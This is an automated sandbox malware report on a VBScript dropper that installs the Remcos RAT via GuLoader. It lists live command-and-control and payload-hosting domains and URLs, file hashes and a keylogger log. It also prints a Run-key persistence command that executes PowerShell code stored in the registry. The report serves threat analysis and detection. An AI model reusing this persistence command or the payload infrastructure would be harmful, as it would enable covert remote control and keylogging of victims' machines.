          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          BITS Jobs          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
          Process Injection          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1410613 Sample: BKGCONF-THD1914129-BKGCONF-... Startdate: 18/03/2024 Architecture: WINDOWS Score: 100 54 rnnfibiteammony.duckdns.org 2->54 56 tolatilbu.hopto.org 2->56 58 2 other IPs or domains 2->58 72 Multi AV Scanner detection for domain / URL 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Antivirus detection for URL or domain 2->76 80 8 other signatures 2->80 12 wscript.exe 1 2->12         started        15 svchost.exe 1 2 2->15         started        signatures3 78 Uses dynamic DNS services 54->78 process4 dnsIp5 90 VBScript performs obfuscated calls to suspicious functions 12->90 92 Suspicious powershell command line found 12->92 94 Wscript starts Powershell (via cmd or directly) 12->94 96 4 other signatures 12->96 18 powershell.exe 16 12->18         started        64 brustiaalfa.websin.it 89.40.227.248, 443, 49732, 49733 ASSEFLOWAmsterdamInternetExchangeAMS-IXIT Romania 15->64 66 127.0.0.1 unknown unknown 15->66 signatures6 process7 signatures8 68 Suspicious powershell command line found 18->68 70 Very long command line found 18->70 21 powershell.exe 22 18->21         started        24 conhost.exe 18->24         started        process9 signatures10 84 Writes to foreign memory regions 21->84 86 Powershell uses Background Intelligent Transfer Service (BITS) 21->86 88 Found suspicious powershell code related to unpacking or dynamic code loading 21->88 26 wab.exe 7 11 21->26         started        process11 dnsIp12 60 rnnfibiteammony.duckdns.org 180.214.236.46, 4848, 49745, 49747 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 26->60 62 maso.ge 195.54.178.4, 443, 49743, 49748 ASDELTATELECOMRU Georgia 26->62 50 C:\Users\user\...\Klassespecifikke.vbs, ASCII 26->50 dropped 52 C:\ProgramData\remcos\logs.dat, data 26->52 dropped 98 Installs a global keyboard hook 26->98 31 wscript.exe 1 26->31         started        34 cmd.exe 1 26->34         started        file13 signatures14 process15 signatures16 102 Suspicious powershell command line found 31->102 104 Wscript starts Powershell (via cmd or directly) 31->104 106 Very long command line found 31->106 108 3 other signatures 31->108 36 powershell.exe 21 31->36         started        39 WmiPrvSE.exe 31->39         started        41 conhost.exe 34->41         started        43 reg.exe 1 1 34->43         started        process17 signatures18 82 Powershell uses Background Intelligent Transfer Service (BITS) 36->82 45 wab.exe 36->45         started        48 conhost.exe 36->48         started        process19 signatures20 100 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 45->100

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          BKGCONF-THD1914129-BKGCONF-THD1914129.vbs0%ReversingLabs
          BKGCONF-THD1914129-BKGCONF-THD1914129.vbs0%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          rnnfibiteammony.duckdns.org15%VirustotalBrowse
          tolatilbu.hopto.org15%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://crl.micro0%URL Reputationsafe
          http://crl.micro0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
          https://go.micro0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://maso.ge/wp-admin/gGzbBm204.bin0%Avira URL Cloudsafe
          https://brustiaalfa.websin.it/Produktionshallens.thn0%Avira URL Cloudsafe
          https://maso.ge/wp-admin/Reciteret.rar0%Avira URL Cloudsafe
          http://crl.microR0%Avira URL Cloudsafe
          https://brustiaalfa.websin.it/zwDhHUJEmBIkUtXcwKsarX186.bin0%Avira URL Cloudsafe
          https://maso.ge/wp-admin/Klassespecifikke.vbs0%Avira URL Cloudsafe
          https://brustiaalfa.websin.it/Produktionshallens.thnp0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          brustiaalfa.websin.it
          		89.40.227.248
          		truefalse
            		unknown
            rnnfibiteammony.duckdns.org
            		180.214.236.46
            		truetrueunknown
            maso.ge
            		195.54.178.4
            		truefalse
              		unknown
              tolatilbu.hopto.org
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://maso.ge/wp-admin/gGzbBm204.binfalse
              • Avira URL Cloud: safe
              		unknown
              https://brustiaalfa.websin.it/zwDhHUJEmBIkUtXcwKsarX186.binfalse
              • Avira URL Cloud: safe
              		unknown
              https://maso.ge/wp-admin/Reciteret.rarfalse
              • Avira URL Cloud: safe
              		unknown
              https://brustiaalfa.websin.it/Produktionshallens.thnfalse
              • Avira URL Cloud: safe
              		unknown
              https://maso.ge/wp-admin/Klassespecifikke.vbsfalse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000006.00000003.2272203577.00000273EF1A3000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2842855560.00000220BC3DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2900292990.00000220CA6EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2900292990.00000220CA830000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2842855560.00000220BAA2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.0000000005776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://crl.micropowershell.exe, 00000005.00000002.2801177789.000000000709B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2768378131.0000000004867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2801177789.0000000007070000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2768378131.0000000004867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2801177789.0000000007070000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://go.micropowershell.exe, 00000003.00000002.2842855560.00000220BB5A0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://aka.ms/pscore6lBeqpowershell.exe, 00000005.00000002.2768378131.0000000004711000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2900292990.00000220CA6EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2900292990.00000220CA830000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2842855560.00000220BA8B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.0000000005776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2272203577.00000273EF130000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://aka.ms/pscore68powershell.exe, 00000003.00000002.2842855560.00000220BA681000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2842855560.00000220BA681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2768378131.0000000004711000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2768378131.0000000004867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2801177789.0000000007070000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://crl.microRpowershell.exe, 00000005.00000002.2765789549.000000000099C000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://brustiaalfa.websin.it/Produktionshallens.thnppowershell.exe, 00000003.00000002.2842855560.00000220BA8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                195.54.178.4
                                		maso.geGeorgia
                                		51147ASDELTATELECOMRUfalse
                                89.40.227.248
                                		brustiaalfa.websin.itRomania
                                		49367ASSEFLOWAmsterdamInternetExchangeAMS-IXITfalse
                                180.214.236.46
                                		rnnfibiteammony.duckdns.orgViet Nam
                                		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

                                Private

                                IP
                                127.0.0.1

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1410613
                                Start date and time:2024-03-18 08:06:11 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 9m 44s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:18
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Sample name:BKGCONF-THD1914129-BKGCONF-THD1914129.vbs
                                Detection:MAL
                                Classification:mal100.troj.spyw.expl.evad.winVBS@22/16@13/4
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 70%
                                • Number of executed functions: 37
                                • Number of non-executed functions: 15
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs

                                Warnings

                                • Connection to analysis system has been lost, crash info: Unknown
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                • Excluded IPs from analysis (whitelisted): 40.126.24.149, 40.126.24.146, 40.126.24.148, 40.126.24.83, 40.126.24.82, 40.126.24.147, 40.126.24.84, 20.190.152.20
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                • Execution Graph export aborted for target powershell.exe, PID 1628 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 1960 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 5312 because it is empty
                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                08:07:22API Interceptor104x Sleep call for process: powershell.exe modified
                                08:07:26API Interceptor2x Sleep call for process: svchost.exe modified
                                08:08:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run obviously %Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)
                                08:08:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run obviously %Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                195.54.178.4https://www.klubik.ge/wp-admin/tconta/?cid=bsmarado@emfa.ptGet hashmaliciousUnknownBrowse
                                  180.214.236.46TNT-FEDEX-SHIPMENT-DELIVERY-FORM-3073736358-Incomplete Address.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                    ___________-29-01-24.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                      CR-FEDEX_TNT-903773663_TNT_AD-10440501_CF-0380.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                        17058285076c37a7073b87ecdd13242beec1b9459e2f79782c6bee6be8ad8e0ae732d6cb0f664.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                          DOC_SCANNER_847464_8474.vbsGet hashmaliciousRemcosBrowse
                                            Scan_October_17th_Print_Request.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                              CR-FEDEX_TNT-SHIPMENT_930388383_NOTICE_84937739038.vbsGet hashmaliciousRemcosBrowse
                                                DHL_STATEMENT_OF_ACCOUNT-UNPAID_INVOICE.jsGet hashmaliciousRemcosBrowse
                                                  o1f4NDWzNn.exeGet hashmaliciousRemcosBrowse
                                                    bOd2.exeGet hashmaliciousRemcosBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      rnnfibiteammony.duckdns.orgTNT-FEDEX-SHIPMENT-DELIVERY-FORM-3073736358-Incomplete Address.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 180.214.236.46
                                                      ___________-29-01-24.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 180.214.236.46
                                                      CR-FEDEX_TNT-903773663_TNT_AD-10440501_CF-0380.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 180.214.236.46
                                                      17058285076c37a7073b87ecdd13242beec1b9459e2f79782c6bee6be8ad8e0ae732d6cb0f664.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                      • 180.214.236.46
                                                      DOC_SCANNER_847464_8474.vbsGet hashmaliciousRemcosBrowse
                                                      • 180.214.236.46
                                                      Scan_October_17th_Print_Request.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 180.214.236.46
                                                      CR-FEDEX_TNT-SHIPMENT_930388383_NOTICE_84937739038.vbsGet hashmaliciousRemcosBrowse
                                                      • 180.214.236.46
                                                      BL_HDYDEY32.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 192.3.13.112
                                                      Purchase_Inquiry_Evermore_Group.vbsGet hashmaliciousRemcosBrowse
                                                      • 199.195.253.181

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      ASDELTATELECOMRUhttps://www.klubik.ge/wp-admin/tconta/?cid=bsmarado@emfa.ptGet hashmaliciousUnknownBrowse
                                                      • 195.54.178.4
                                                      tcA9GYD5GuGet hashmaliciousMiraiBrowse
                                                      • 195.54.178.2
                                                      ASSEFLOWAmsterdamInternetExchangeAMS-IXIT5f1uj5aMdD.elfGet hashmaliciousUnknownBrowse
                                                      • 95.141.43.103
                                                      file.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Stealc, XmrigBrowse
                                                      • 83.136.106.50
                                                      yaALNupJCH.exeGet hashmaliciousAmadey, Remcos, VidarBrowse
                                                      • 95.141.41.12
                                                      szsLEDKLDZ.elfGet hashmaliciousUnknownBrowse
                                                      • 92.114.92.30
                                                      9nSv9py6hs.exeGet hashmaliciousDanaBotBrowse
                                                      • 95.141.32.211
                                                      file.exeGet hashmaliciousDanaBotBrowse
                                                      • 95.141.32.211
                                                      upx9bnsbiZ.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                      • 95.141.41.13
                                                      file.exeGet hashmaliciousDanaBot, Raccoon Stealer v2, SmokeLoaderBrowse
                                                      • 95.141.41.13
                                                      bdf7f13dca65ddcf112e9ff77f6ea6ca00c9dc23f5f60.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                      • 95.141.41.13
                                                      SecuriteInfo.com.MSIL.Small.CO.tr.25516.exeGet hashmaliciousUnknownBrowse
                                                      • 95.141.38.173
                                                      VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNH2A6LpLYtc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 14.225.234.68
                                                      catzx.scr.exeGet hashmaliciousNanocore, PureLog StealerBrowse
                                                      • 103.114.104.158
                                                      Factura 79.docGet hashmaliciousNanocore, PureLog StealerBrowse
                                                      • 103.114.104.158
                                                      SecuriteInfo.com.Win32.CrypterX-gen.31058.18522.exeGet hashmaliciousNanocoreBrowse
                                                      • 103.114.104.158
                                                      9hhv3eDQsn.exeGet hashmaliciousNanocore, PureLog StealerBrowse
                                                      • 103.114.104.158
                                                      NEW ORDER.docGet hashmaliciousNanocore, PureLog StealerBrowse
                                                      • 103.114.104.158
                                                      HDTFFrAXui.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                      • 103.200.23.98
                                                      hxM0QidAhi.exeGet hashmaliciousNanocoreBrowse
                                                      • 103.114.104.158
                                                      2kD4ifhFhV.exeGet hashmaliciousNanocore, PureLog StealerBrowse
                                                      • 103.114.104.158
                                                      NEW ORDER QUANTITY.docGet hashmaliciousNanocore, PureLog StealerBrowse
                                                      • 103.114.104.158

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      28a2c9bd18a11de089ef85a160da29e4http://docs.google.com/presentation/d/e/2PACX-1vSoFYly7DA_QOx1-oa4Z930-rXqKhRDb4g1p62g-gRoh4ijJNtvMcjW6eZ2QQBeKy4KrVPZxjmK7E-Q/pub?start=false&loop=false&delayms=3000Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      lnvoice-1605700252.pdf .jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      http://www.51bcm.com:8088Get hashmaliciousUnknownBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      Subscription Billing Statement.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      https://cloudflare-ipfs.com/ipfs/bafkreif2klim7glbgcsrfe6lm7wfd2scwmhee5i6dglyggzgvjgl53zw2i/Get hashmaliciousHTMLPhisherBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      https://www.vmvwx.cn/Get hashmaliciousUnknownBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      https://dxicarcc.dynv6.net/Get hashmaliciousUnknownBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      https://www.kcgmi.cn/Get hashmaliciousUnknownBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      https://www.ckygy.cn/Get hashmaliciousUnknownBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      https://www.eehvh.cn/Get hashmaliciousUnknownBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      37f463bf4616ecd445d4a1937da06e19invoice.vbsGet hashmaliciousXWormBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      Setup.exeGet hashmaliciousLummaC, PureLog Stealer, XmrigBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      KT0b2oEFIV.exeGet hashmaliciousVidarBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      g8DU6moaZ0.exeGet hashmaliciousAmadey, Mars Stealer, RisePro Stealer, SmokeLoader, Stealc, VidarBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      SecuriteInfo.com.Win32.AdwareX-gen.20903.16690.exeGet hashmaliciousUnknownBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      Mw59hGEx48.exeGet hashmaliciousGuLoader, PureLog StealerBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      SecuriteInfo.com.FileRepMalware.25983.22631.exeGet hashmaliciousUnknownBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      SecuriteInfo.com.FileRepMalware.25983.22631.exeGet hashmaliciousUnknownBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      venerationens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248
                                                      Quote.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 195.54.178.4
                                                      • 89.40.227.248

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xac90964b, page size 16384, DirtyShutdown, Windows version 10.0
                                                      Category:dropped
                                                      Size (bytes):1310720
                                                      Entropy (8bit):0.658561270235085
                                                      Encrypted:false
                                                      SSDEEP:1536:pSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:paza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                      MD5:26135EC19A06545B9A020B90EAF780CC
                                                      SHA1:64E5AE4CD53C971617BC0260C79C5DE14F265841
                                                      SHA-256:B9E3CDD7DE37ED18F8C04FDE5EE2E5739054EBC7631E6FD05AA37975F03DE73D
                                                      SHA-512:E8E9CBF3CE6FCB352B16155896B65F4E93E271D49CA5FEECD86085ABF442CD4EE3840D7D786E1CFC72565E05544607A9ED0940C4564A0D1E4CB41937315E2629
                                                      Malicious:false
                                                      Preview:...K... ...............X\...;...{......................0.z..........{.......|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................... .....|#..................I.......|#..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\remcos\logs.dat

                                                      Download File
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288
                                                      Entropy (8bit):3.3264850572432407
                                                      Encrypted:false
                                                      SSDEEP:6:6lolclxql55YcIeeDAlKe52WA41gWAAe5q1gWAv:6lolfhec8e52WIWFe5BW+
                                                      MD5:05F35F86A26E986E726EFEB3B6B65BB1
                                                      SHA1:84C9E175B7F4D5B6D481202C1BD889E8DD27EC0B
                                                      SHA-256:DF61BE53FFCA15FC17972C97409E619A0AF971CB7D9F89419058313472A8EAEC
                                                      SHA-512:978304DC7424400ECDEE834949F4A94579EF024209EF1C7DEE59091BE50D3B854B83B60D36B435448AD4F6851E4888F2B885876E94973791E12C1A7A352E6C8C
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                      Preview:....[.2.0.2.4./.0.3./.1.8. .0.8.:.0.8.:.1.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].....[.W.i.n.].r.....[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):11914
                                                      Entropy (8bit):4.896235276832004
                                                      Encrypted:false
                                                      SSDEEP:192:Ixoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sa:WVib49+VoGIpN6KQkj2xkjh4iUxRcYK6
                                                      MD5:96420197D195D4ABC60724F24234CACA
                                                      SHA1:192ACD14552FB56B27AE0DD34B5B6DFCC6152B9B
                                                      SHA-256:0DCE3F924E46FDA8B63D8DA386D20D70EAA0C4C528DD4032DF0D8702FDC1B91D
                                                      SHA-512:14510349BB77CE85A5B2B2B3E934EA4A9F074F891A934299C9B839E7E16E271807B2814E780CD1A9862D5D1B1303E7C74DA89300C2CF655EB99DDAB82909680F
                                                      Malicious:false
                                                      Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                      MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                      SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                      SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                      SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                      Malicious:false
                                                      Preview:@...e................................................@..........

                                                      C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs

                                                      Download File
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):266951
                                                      Entropy (8bit):5.109438425605264
                                                      Encrypted:false
                                                      SSDEEP:6144:NWKtYtINI5Mk6fqMKYJwMHy0J4iwLwhB2UcJXkcY9CdLzHxYRvbFjtkBbwhMrO+9:4qV3hlv09rDBv
                                                      MD5:24E91A49607EDE884A14B783CB121F06
                                                      SHA1:36747BFDDF559B80BB10B00B24C67FDBBF5B9752
                                                      SHA-256:56F1CDBF09847AAD535B64C84BF66D423701FEC3F324CAB83C9D8E17CD976226
                                                      SHA-512:2B93B5A99F3409AF7C1F0B3C9E77006B9130A034641D718B499F57867311A0907D658AA529DECD71DB39E71FE90908D46CA79AC3EC00B9D6996C58B282795237
                                                      Malicious:true
